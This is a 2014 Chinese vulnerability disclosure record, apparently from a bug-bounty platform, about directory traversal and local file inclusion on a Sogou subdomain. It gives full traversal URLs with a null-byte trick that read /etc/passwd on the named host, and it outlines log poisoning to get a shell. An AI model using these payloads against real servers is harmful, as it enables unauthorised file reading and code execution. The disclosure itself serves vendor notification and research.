漏洞概要
关注数(24)
关注此漏洞
漏洞标题:搜狗某分站目录遍历,本地文件包含,或通过日志getshell
相关厂商:搜狗
提交时间:2014-10-14 20:37
修复时间:2014-10-18 21:14
公开时间:2014-10-18 21:14
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2014-10-14: 细节已通知厂商并且等待厂商处理中
2014-10-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
搜狗某分站目录遍历,本地文件包含,或通过日志getshell
详细说明:
目录遍历位于:
http://novel.mse.sogou.com/catalog/action.php?c=../../../../../../../../../../etc/passwd%00.jpg&m=get&refer=latest&sogouid=
参数c需要过滤。
若上传文件到站点上,可任意代码执行,getshell:
http://novel.mse.sogou.com/catalog/action.php?c=../css/base.css%00.jpg&m=get&refer=latest&sogouid=
一个利用思路是写入php代码到web日志,并包含log文件getshell,未测试。
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-10-18 21:14
厂商回复:
您好,该漏洞已在SGSRC平台提交,并已修复,此处忽略,感谢支持,欢迎到SGSRC平台提交漏洞。
最新状态:
暂无